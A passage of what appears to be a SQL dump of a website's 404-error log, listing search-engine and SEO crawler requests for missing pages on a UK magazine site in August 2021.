5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(561,'2021-08-25 00:02:51','/coharmoniously934266.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(562,'2021-08-25 00:06:09','/baa1118129.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(563,'2021-08-25 00:06:19','/2018/01','https://www.westonspirit.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)',NULL,404,'GET',NULL,'17.121.115.188'),(564,'2021-08-25 00:06:55','/osteanabrosis1118764.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(565,'2021-08-25 00:08:16','/a-bit-of-all-white','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(566,'2021-08-25 00:09:27','/brayer1038585.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(567,'2021-08-25 00:10:05','/i-couldnt-live-without-my-egg-timer','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(568,'2021-08-25 00:10:33','/anaphroditic1272831.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(569,'2021-08-25 00:12:46','/autoist374640.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(570,'2021-08-25 00:13:56','/author/westonspirit/page/5','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)',NULL,404,'GET',NULL,'185.191.171.43'),(571,'2021-08-25 00:17:24','/numberable1087907.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(572,'2021-08-25 00:23:17','/letter-from-the-editor','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.64'),(573,'2021-08-25 00:25:20','/managing-arthritis-the-natural-way','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(574,'2021-08-25 00:25:39','/how-to-get-the-funeral-you-want','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(575,'2021-08-25 00:26:44','/climbing1232050.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(576,'2021-08-25 00:30:20','/hamulose1875030.html','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'79.110.53.26'),(577,'2021-08-25 00:31:31','/boodleize281745.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(578,'2021-08-25 00:32:45','/hemihypoesthesia1226636.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(579,'2021-08-25 00:33:58','/cordially1147637.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(580,'2021-08-25 00:35:11','/glacioaqueous918921.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(581,'2021-08-25 00:36:52','/2019/04','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(582,'2021-08-25 00:40:02','/2015','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.1'),(583,'2021-08-25 00:40:06','/climbing312550.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(584,'2021-08-25 00:41:19','/Limacinidae1213799.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(585,'2021-08-25 00:43:01','/in-honor-of-older-americans-month-happy-80th-birthday-mom','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(586,'2021-08-25 00:47:29','/demidevil1117919.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(587,'2021-08-25 00:49:58','/cordially364437.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(588,'2021-08-25 00:51:12','/biguttulate976058.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(589,'2021-08-25 00:56:13','/bimucronate910115.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(590,'2021-08-25 00:57:03','/bean-there-done-that','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.118'),(591,'2021-08-25 01:02:56','/glacioaqueous1103421.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(592,'2021-08-25 01:03:00','/doorstop1121834.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(593,'2021-08-25 01:03:39','/boodleize303545.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(594,'2021-08-25 01:04:55','/foxchop311947.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(595,'2021-08-25 01:07:20','/thinkers-and-drinkers','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(596,'2021-08-25 01:08:41','/inkhornize916055.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(597,'2021-08-25 01:09:57','/encommon277686.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(598,'2021-08-25 01:13:33','/into-the-wild','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.118'),(599,'2021-08-25 01:13:37','/bite-into-a-birthday','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(600,'2021-08-25 01:13:42','/get-up-and-go-may','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(601,'2021-08-25 01:13:48','/quality-beyond-compare','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(602,'2021-08-25 01:16:25','/lumpishly983184.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(603,'2021-08-25 01:18:21','/hex/0','https://www.westonspirit.org.uk','Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/92.0.4515.119 Safari/537.36','https://www.westonspirit.org.uk/hex/video-uk-Millwall-v-Cambrid-falu-tv01.html',404,'GET',NULL,'66.102.6.247'),(604,'2021-08-25 01:21:38','/inkhornize323155.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(605,'2021-08-25 01:22:32','/category/uk_news/page/10','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.157.33'),(606,'2021-08-25 01:25:35','/autocollimation1272560.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(607,'2021-08-25 01:33:30','/eranist947527.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(608,'2021-08-25 01:37:18','/weston_script_pics/2018/04/barn-wood-texture_4460x4460-1024x683.jpg','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.118'),(609,'2021-08-25 01:39:13','/category/uk_news/page/22','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(610,'2021-08-25 01:40:09','/aerogen1013989.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(611,'2021-08-25 01:42:52','/flatways366596.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(612,'2021-08-25 01:49:14','/hex/0','https://www.westonspirit.org.uk','Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/92.0.4515.119 Safari/537.36','https://www.westonspirit.org.uk/hex/video-uk-Millwall-v-Cambrid-falu-tv01.html',404,'GET',NULL,'66.102.6.247'),(613,'2021-08-25 01:49:40','/Limacinidae1233099.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(614,'2021-08-25 01:51:28','/theyre-playing-our-song','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.149.1'),(615,'2021-08-25 01:51:40','/ads.txt','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(616,'2021-08-25 01:52:24','/lumpishly908984.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(617,'2021-08-25 01:56:32','/caryatidal366817.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(618,'2021-08-25 01:57:53','/bascule1271012.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(619,'2021-08-25 02:02:33','/get-up-and-go-august','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(620,'2021-08-25 02:02:39','/hunt-with-highest-calibre','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(621,'2021-08-25 02:02:44','/retirement-with-added-social-life','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,404,'GET',NULL,'216.244.66.239'),(622,'2021-08-25 02:03:23','/foregallery281832.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(623,'2021-08-25 02:05:05','/2016/04','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(624,'2021-08-25 02:06:53','/this-life-lesley-arrett','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(625,'2021-08-25 02:07:33','/foregallery912432.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(626,'2021-08-25 02:08:55','/amphoriloquy284601.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(627,'2021-08-25 02:10:19','/anaphroditic1103131.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(628,'2021-08-25 02:11:42','/caryatidal377717.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(629,'2021-08-25 02:13:07','/cholemia1179210.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(630,'2021-08-25 02:13:49','/a-matter-of-taste','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.135.120'),(631,'2021-08-25 02:14:30','/caryatidal1158917.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(632,'2021-08-25 02:15:54','/2017','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.136.247'),(633,'2021-08-25 02:17:16','/hemihypoesthesia1236036.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(634,'2021-08-25 02:17:59','/2016/12','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.88'),(635,'2021-08-25 02:20:05','/churlishly351353.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(636,'2021-08-25 02:21:37','/flatways1122596.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(637,'2021-08-25 02:26:15','/knocker1264372.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(638,'2021-08-25 02:26:58','/liable1127222.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(639,'2021-08-25 02:27:40','/author/westonspirit/page/19','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)',NULL,404,'GET',NULL,'114.119.148.60'),(640,'2021-08-25 02:34:09','/anaphroditic352331.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(641,'2021-08-25 02:34:54','/horal.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(642,'2021-08-25 02:35:34','/glossopalatine973025.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(643,'2021-08-25 02:39:51','/aerogen1202689.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(644,'2021-08-25 02:42:42','/lexicologist353316.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(645,'2021-08-25 02:44:07','/anaphroditic342131.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(646,'2021-08-25 02:44:10','/autocollimation310860.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(647,'2021-08-25 02:45:33','/liable1206822.html','https://www.westonspirit.org.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(648,'2021-08-25 